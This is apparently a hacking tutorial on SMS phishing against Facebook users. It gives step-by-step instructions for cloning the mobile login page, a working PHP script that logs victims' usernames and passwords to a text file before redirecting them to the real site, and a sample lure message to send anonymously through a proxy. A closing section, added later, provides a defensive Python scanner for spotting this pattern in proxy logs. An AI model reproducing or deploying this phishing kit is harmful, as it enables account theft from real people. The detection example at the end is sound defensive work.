SMS Phishing
What happens?
The victim receives an SMS on his mobile, apparently from Facebook, asking
him to try out a new version of Facebook. A link is provided in the SMS. The
victim opens the link and sees the Facebook login page. He logs in
and it shows that the username/password is wrong. He gets phished...
To proceed, you need to have a web server running on your computer connected to the internet, and the mobile number of the victim.
Process:
SETTING UP YOUR PHISHING PAGE.
Go to http://m.facebook.com/
and copy the source code. Place it in your web server's public html folder
with ".htm" as extension. Open this html file in notepad and go to the
form tag. In that, replace the form method from POST to GET. Change the
form action value to write.php (you can change the name if you want).
Rename the file as "index.htm". Create another file and name it as
"write.php". Open write.php and copy the following content to the same.
Save it.
Code:
<?php
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");
$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Also create another file pswd.txt and leave it as it is. This is the file where our usernames and passwords are getting stored.
You can store these files in any directory under public html. Remember
to keep the name of directory something like facebook or similar.
Now start the server.
CHECKING IF OUR PHISHING PAGE IS WORKING.
Go to cmyip.com to find out your IP address. Paste this IP address in the
address bar. You should see your phishing page or your default
index.htm (if the files are stored in any directory under public html).
If not, the following may be the reasons for it:
1. You may be behind a router. So, you need to open the router's settings and enable port forwarding to your machine.
2. Your server may be configured not to allow any outside connections.
So, check the access settings and enable outside connections.
3. Your server may not be running properly.
Now, you need to navigate to the directory in which our phishing files
are stored. For example, my files are in /smsphish under public html.
So, I'll navigate to...
http://myipaddress/smsphish/
There you can see the fake login of Facebook. You can enter any fake stuff in
the username and password fields. Press enter. It should redirect you to the
actual Facebook mobile site. Now, open our pswd.txt file and see if our
entered details are logged there. If they are, our work is mostly done.
If they are not, check that you have made the necessary changes in index.htm
and that write.php has not been tampered with.
Now nearly 90% work is done. We move to the last step...
SENDING THE SMS.
Now you have to find free SMS sites which do not require you to
register. These sites use their own number for sending messages. You
can find many such sites. One word: Google. Now here come our social
engineering techniques. Just type a message like "Experience the brand
new, more secure version of facebook, simply follow the link,.. blah
blah" and give the link to our phishing page. A sample message would look
like this.
Quote
Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://youripaddress/yourdirectory/
-Facebook development team.
You can think of many more luring techniques... just think!
Enter the victim's mobile number and send the message! (Using a proxy is
recommended.) If he opens the message and the link, he will see the normal
Facebook mobile login, and if he enters the correct details, our phishing
worked! Just keep watch on pswd.txt for their details!
Note: Be careful when running server!
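Seen from the defender's side, the setup described above leaves a recognisable trace in web proxy logs: because the form is switched to GET, the submitted fields appear in the URL of the request to write.php, and the reply is a redirect to the real Facebook login. The Python sketch below is an added example, not part of the original post; the log layout, the field names (email, pass) and the sample lines are constructed assumptions.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Assumed field names: the post does not list them; these are common login-form names.
CRED_KEYS = {"pass", "password", "passwd", "pwd"}
BRAND_HOSTS = ("facebook.com",)  # legitimate domains of the impersonated brand

def is_brand_host(host):
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BRAND_HOSTS)

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def score_request(url, status, location):
    """Return the reasons one proxy log entry matches the behaviour described above."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if is_brand_host(host):
        return []  # traffic to the real site is out of scope
    reasons = []
    params = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
    if params & CRED_KEYS:
        reasons.append("credential field in GET query string")
    if status in (301, 302, 303, 307) and is_brand_host(urlsplit(location).hostname or ""):
        reasons.append("off-brand host redirects to brand login")
    if is_ip_literal(host):
        reasons.append("bare IP address as host")
    return reasons

# Constructed sample log. Columns: method, URL, status, Location header ("-" if none).
SAMPLE_LOG = """\
GET http://203.0.113.7/smsphish/write.php?email=a%40example.org&pass=hunter2 302 http://m.facebook.com/login.php
GET https://m.facebook.com/login.php 200 -
GET http://198.51.100.20/status 200 -
GET https://shop.example.net/search?q=password+manager 200 -
"""

def scan(log_text, threshold=2):
    """Flag GET requests that match at least `threshold` indicators."""
    hits = []
    for line in log_text.splitlines():
        method, url, status, location = line.split()
        reasons = score_request(url, int(status), location)
        if method == "GET" and len(reasons) >= threshold:
            hits.append((urlsplit(url).hostname, reasons))
    return hits

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_LOG):
        print(host, "->", "; ".join(reasons))
```

Requiring two indicators keeps a bare-IP status page or a search for "password manager" from alerting on its own.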